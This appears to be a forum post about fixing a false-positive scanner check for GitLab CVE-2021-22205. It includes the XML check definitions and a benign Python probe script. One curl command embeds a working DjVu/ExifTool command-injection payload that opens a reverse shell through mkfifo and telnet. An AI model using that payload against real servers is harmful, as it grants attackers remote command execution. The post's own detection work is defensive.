I'm ecstatic that a cookie fingerprint and remote check were made available for GitLab CVE-2021-22205. We run a lot of GitLab instances, and the check is so close, but it looks like the implementation is off by just a little bit.
R7 has a great analysis of the vulnerability that absolutely helps in narrowing down the false positives: CVE-2021-22205 | AttackerKB
Getting right down to it: the check sends a POST to /rapid7/cve-2021-22205.jpg, which does trigger a 422 response, but it triggers it on patched systems too. It looks like the logic issue is that no image data is actually being posted, and the GitLab router still responds with a 422 on a patched system.
<?xml version="1.0" encoding="UTF-8"?>
<!--
Checks if the instance is running GitLab.
If successful, it sends a bogus image to the URI and checks the response;
if we get a 422, the instance is reported vulnerable.
-->
<VulnerabilityCheck id="gitlab-cve-2021-22205" scope="endpoint">
  <NetworkService type="HTTP|HTTPS">
    <Product vendor="GitLab" name="GitLab"/>
  </NetworkService>
  <HTTPCheck>
    <HTTPRequest method="POST">
      <URI>/rapid7/cve-2021-22205.jpg</URI>
      <HTTPResponse code="422"/>
    </HTTPRequest>
  </HTTPCheck>
</VulnerabilityCheck>
However, if you POST image data to the GitLab service, it returns the expected 404 if it has been patched. So something like the following gets the appropriate response.
curl -i -s -k -X $'POST' \
-H $'Host: 127.0.0.1' -H $'Content-Type: multipart/form-data; boundary=------------------------3749bbf4d5269117' -H $'Connection: close' \
--data-binary $'--------------------------3749bbf4d5269117\x0d\x0aContent-Disposition: form-data; name=\"file\"; filename=\"cve-2021-22205.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0aAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\x0a\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9\x7f*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\x0aFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\x0a\x09(Copyright \"\\\x0a\" . qx{TF=$(mktemp -u);mkfifo $TF && telnet 127.0.0.1 5555 0<$TF | sh 1>$TF} . \\\x0a\" b \") ) \x0a\x0d\x0a--------------------------3749bbf4d5269117--\x0d\x0a' \
$'http://127.0.0.1/de0cf91a2f2aafef'
I'm trying to determine whether there is a best practice for setting a benign image payload in the check, so that an updated check actually posts image data. Something like, but not exactly, the following:
<VulnerabilityCheck id="gitlab-cve-2021-22205" scope="endpoint">
  <NetworkService type="HTTP|HTTPS">
    <Product vendor="GitLab" name="GitLab"/>
  </NetworkService>
  <HTTPCheck>
    <HTTPRequest method="POST">
      <URI>/rapid7_cve-2021-22205</URI>
      <mimeContent type="multipart/form-data">
        <value format="hex">{insert payload hex here}</value>
      </mimeContent>
      <HTTPResponse code="422"/>
    </HTTPRequest>
  </HTTPCheck>
</VulnerabilityCheck>
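As an added illustration of the benign-payload version of this check (my own example, not Rapid7's check code or GitLab's), the script below builds a proper multipart/form-data body around a constructed four-byte JPEG stub instead of the DjVu document, POSTs it to the path from the check above, and maps the reply to a result using the status codes described in this post (422 with real image data on an unpatched instance, 404 on a patched one). The path, the stub bytes and the result labels are assumptions for the example.

```python
import urllib.error
import urllib.request
import uuid

# Constructed, benign "image": a JPEG start-of-image marker followed by an
# end-of-image marker. It carries no metadata, so there is nothing for
# ExifTool to act on; it only needs to be handled as an image upload.
BENIGN_JPEG = b"\xff\xd8\xff\xd9"

# Probe path taken from the draft check above (assumed for this example).
CHECK_PATH = "/rapid7_cve-2021-22205"


def build_multipart(filename, data, boundary=None):
    """Return (content_type, body) for a single-file multipart/form-data POST."""
    boundary = boundary or uuid.uuid4().hex
    body = b"".join([
        b"--" + boundary.encode() + b"\r\n",
        b'Content-Disposition: form-data; name="file"; filename="'
        + filename.encode() + b'"\r\n',
        b"Content-Type: image/jpeg\r\n\r\n",
        data + b"\r\n",
        b"--" + boundary.encode() + b"--\r\n",
    ])
    return "multipart/form-data; boundary=" + boundary, body


def classify(status):
    """Map the status of the image POST to a result, per the post above:
    422 is what unpatched instances return when image data is posted,
    404 is what a patched instance returns. Anything else is inconclusive."""
    if status == 422:
        return "likely vulnerable"
    if status == 404:
        return "patched"
    return "inconclusive"


def check(base_url, timeout=10):
    """POST the benign image to base_url + CHECK_PATH and classify the reply."""
    ctype, body = build_multipart("cve-2021-22205.jpg", BENIGN_JPEG)
    req = urllib.request.Request(base_url.rstrip("/") + CHECK_PATH,
                                 data=body, method="POST")
    req.add_header("Content-Type", ctype)
    req.add_header("Content-Length", str(len(body)))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status)
    except urllib.error.HTTPError as err:  # 4xx/5xx raise; use the code
        return classify(err.code)
```

The hex form of `body` (for example `body.hex()`) is what would go into the `<value format="hex">` element of the draft check, with the boundary fixed rather than random so the Content-Type header matches.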